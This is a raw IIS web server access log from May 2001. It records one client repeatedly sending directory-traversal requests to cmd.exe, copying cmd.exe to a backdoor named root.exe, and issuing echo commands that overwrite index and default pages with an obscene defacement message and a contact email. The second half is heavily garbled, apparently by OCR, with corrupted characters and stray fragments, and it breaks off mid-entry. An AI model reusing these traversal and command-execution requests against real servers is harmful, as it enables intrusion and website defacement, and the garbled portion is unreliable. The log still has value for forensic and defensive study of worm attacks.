2001-05-06 10:44:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../Scripts/default.asp 502 -
2001-05-06 10:44:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../Scripts/default.htm 502 -
2001-05-06 10:44:13 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:16 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../webpub/index.asp 502 -
2001-05-06 10:44:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../webpub/index.htm 502 -
2001-05-06 10:44:20 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../webpub/default.asp 502 -
2001-05-06 10:44:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../webpub/default.htm 502 -
2001-05-06 10:44:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:24 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/index.asp 502 -
2001-05-06 10:44:26 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/index.htm 502 -
2001-05-06 10:44:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.asp 502 -
2001-05-06 10:44:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 502 -
2001-05-06 10:44:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\wwwroot 200 -
2001-05-06 10:44:32 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/./index.asp 502 -
2001-05-06 10:44:35 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/./index.htm 502 -
2001-05-06 10:44:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/./default.asp 502 -
2001-05-06 10:44:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/./default.htm 502 -
2001-05-06 10:44:39 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:41 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/../index.asp 502 -
2001-05-06 10:44:41 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/../index.htm 502 -
2001-05-06 10:44:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/../default.asp 502 -
2001-05-06 10:44:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/../default.htm 502 -
2001-05-06 10:44:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:46 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/Downloads/index.asp 502 -
2001-05-06 10:44:47 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/Downloads/index.htm 502 -
2001-05-06 10:44:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/Downloads/default.asp 502 -
2001-05-06 10:44:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/Downloads/default.htm 502 -
2001-05-06 10:44:50 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:51 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images/index.asp 502 -
2001-05-06 10:44:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images/index.htm 502 -
2001-05-06 10:44:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images/default.asp 502 -
2001-05-06 10:44:55 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images/default.htm 502 -
2001-05-06 10:44:55 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images.pez/index.asp 502 -
2001-05-06 10:44:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images.pez/index.htm 502 -
2001-05-06 10:44:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/images.pez/
default.asp 502 - : 

2001-05-06 10:44:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^7^«br^^«br^7^«br^»^«ta 
bletwidth%3D100%">*<td*>*<p+talign%3D%22center%22/>"<font+size%3D7+color%3 Dred 
A>fuck+USA+Government’*</font*>“<ir’>”<td’>*<ptalign%3D%22center%22">"<font+size 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>"<td’>*<ptalign%3D%22center%22’><fontts 


l $ | e 


ize?63D4-color?63 Dred^»contact:sysadmcn(g)yahoo.com.cn^«/html^7. /wwwroot/images.pez/ 
default.htm 502 - 

2001-05-06 10:44:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cecho-^«html^»^«body-tbgcolor?63Dblack^7^«br^2^«br^^^«br^»^«br^»^«br^»^«br^7^«ta. 
ble--width?63D10096^^«td^-^«p-align?63D9622center9622^7^«fonttsize963D 7 tcolor?63Dred 
^»fück--US A: Government^«/font^»^«tr^»^«td^7^«p-align963D9622center9022^7^-fonttsize 
763D7-color?63Dred^»fuck--PoizonBOx^«tr^7^«td^^^«p-ralign?63D9622center9622^7^«fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/pagetemplat 
es.pez/index.asp 

502 - 

2001-05-06 10:45:00 128.84.234.79 - 24.9.173.59 80-GET /scripts/root.exe 


/c+echot’<html/>"<body+tbgcolor%3Dblack/>“<br’*>“<br*>“<br’*>*<br’>*<br’>*<br’>*<ta 
blet+width%3D100%*>*<td’>*<ptalign%3D%22center%22*>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>*<td/><ptalign%3D%22center%22’>“<fonttsize 
%3D7+color%3Dred>fuck+P oizonBOx™<tr’>*<td’>"<ptalign%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html’>>../wwwroot/pagetemplat 
es.pez/index. htm 

502 - 

2001-05-06 10:45:03 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot<html/>*<body+bgcolor%3Dblack*>“<br’>“<br’>“<br*><br*>*<br’*>*<br*>"<ta 
ble+width%3D100%*>*<td’>*<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government’*</font’>*<tr’><td’>"<ptalign%3D%22center%22">“<fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>“<td’>"<p+align%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html“>>../Awwwroot/pagetemplat 
es.pez/default.asp 

502 - 

2001-05-06 10:45:05 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^7^«br^»^«br^»^«br^»^«br^»^«br^2^«br^»^«ta 
bletwidth?63D 10096^7^«td^7^«p-align963D9622center9622^»^-«fontsize?63D7--color?63 Dred 
^»fück--US A--Government^«/font^»^«tr^»^«td^^^«p-align?63D9/22center9022^7^-fonttsize 
%3D7+color%3Dred“>fuck+PoizonBOx’<tr’>*<td*><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html“>>../wwwroot/pagetemplat 
es.pez/default htm 

502 - 

2001-05-06 10:45:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exet+root.exe 502 - 

2001-05-06 10:45:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«html^7^«body-"bgcolor?63Dblack^?^«br^^«br^»^«br^»^«br^»^«br^2^«br^7^-«ta 


blet+width%3D100%">*<td’><ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’><td’><p+talign%3D%22center%22’>*<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx*<tr><td’>*<ptalign%3D%22center%22’><font+s 
ize%3D4+color%3Dred”>contact:sysadmcn@yahoo.com.cn*</html”>>. Ga 
.asp 502 - 

2001-05-06 10:45:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body--bgcolor?e3Dblack^^«br^»^«br^»^«br^7^«br^?^«br^^«br^^«ta 
ble-"width?/93D10096^^«td^7^«p-Falign?o3D9622center9622^»^«fonttsize?03D 7--color?63Dred 
“>fuck+USA+Government*</font/>“<tr’>"<td’>"<p+align%3D%22center%22"><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’>"<td’*>"<p+align%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn”*</html’>>../wwwroot/ptjava/index 
-htm 502 - 

2001-05-06 10:45:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+*<html/>"<body+bgcolor%3Dblack’*>“<br’*>*<br’*>*<br*>*<br’*><br’*>*<br’>"<ta 
ble+width%3D100%"><td’>*<ptalign%3D%22center%22/>*<font+size%3D7+color%3Dred . 
“>fuck+USA+Government</font/>"<tr’>*<td’>"<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred>fuck+PoizonBOx<tr’>“<td’>“<ptalign%3D%22center%22">"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.co*</html’>>../wwwroot/ptjava/defau 
It.asp 502 - 

2001-05-06 10:45:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/><bodytbgcolor%3Dblack’/>“<br’><br’>“<br’><br’>"<br’>"<br’>“<ta 
ble+width%3D 100%>*<td/>*<ptalign%3D%22center%22’>*<font+size%3D7+color%3 Dred 
“>fuck+USA+Government</font’>“<tr’>*<td’>*<ptalign%3D%22center%22’>"<fontt size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr*>“<td’>“<ptalign”%3D%22center%22">"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>. a HEN MO OU Parae 
It.htm 502 - 

2001-05-06 10:45:13 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/c+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:15 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+techo+*<html/>*<body+bgcolor%3Dblack*>*<br’*>“<br’*>“<br*>*<br’><br’*>"<br*>"<ta 
ble+width%3D 100%*>*<td*>*<ptalign%3D%22center%22*><font+size%3D7+color%3Dred 
“>fuck+USA+Government’*</font’><tr’>"<td’>*<ptalign%3D%22center%22">"<font+size 
%3D7+color%3Dred*>fuck+PoizonBOx’*<tr’>"<td’>"<ptalign%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com. Oi aa /wwwroot/Secure/inde 
x.asp 502 - 

2001-05-06 10:45:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ctechot^«html^—^«body--bgcolor?e3Dblack^?^«br^»^«br^^^«br^?^«br^»^«br^7^«br^»^«ta 
bletwidth%3D100%*>*<td’><p+talign%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font*>*<tr’>“<td’>"<ptalign%3D”o22center%22’><fontt size 
%3D7+color%3Dred*>fuck+P oizonBOx”<tr’>"<td’>*<ptalign%3 D%22center%22”>*<fontts 


l o 


ize%3D4+color%3Dred“>contact:sysadmcn@yahoo.com.cn’*</html/>>../wwwroot/Secure/inde 
x.htm 502 - 
2001-05-06 10:45:18 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-t^«html^^^«body--bgcolor?63Dblack^»^«br^»^«br^»^«br^^«br^»^«br^»^«br^»^«ta 
bletwidth?63D 10094^—^«td^^^«p-align?63D9622center9622^7^-fonttsize?63D 7--color?63 Dred 
^»fück--USA- Government^«/font^»^«tr^»^«td^»^«p-align?03D9622center?622^7^«font size 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3 Dred’>contact:sysadmen@yahoo.com.cn’*</html’>>../wwwroot/Secure/defa 
ult.asp 502 - 

2001-05-06 10:45:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html>“<body+bgcolor%3 Dblack’*>"<br’*>“<br’>“<br’>"<br’>*<br’><br’><ta 
blet+width%3D100%*>“<td’>*<ptalign%3D%22center%22/>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government™</font/>*<tr’>*<td/>"<p+align%3D%22center%22>"<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>“<td*>*<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3 Dred“*>contact:sysadmen@yahoo.com.cn’*</html“>>../wwwroot/Secure/defa 
ult.htm 502 - 

2001-05-06 10:45:22 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
./¢+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-"bgcolor?s3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
blet+width%3D100%>“<td’>“<ptalign%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr>“<td/>“<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred“>fuck+PoizonBOx<tr’>*<td’><ptalign%3D%22center%224>“<fontts 
ize%3D4+color™%3Dred“>contact:sysadmcn@yahoo.com.cn’*</html>>../wwwroot/test/index.as 
p 502 - 

2001-05-06 10:45:24 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor$63Dblack^»^«br^»^«br^»^«br^^«br^^«br^»^«br^^«ta 
blet+width%3D100%*>*<td*>“<ptalign%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government“</font’>“<tr’>“<td’>“<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred>fuck+PoizonBOx’<tr’><td’><p+align%3D%22center%22*>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/test/index. ht 
m 502 - 

2001-05-06 10:45:25 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


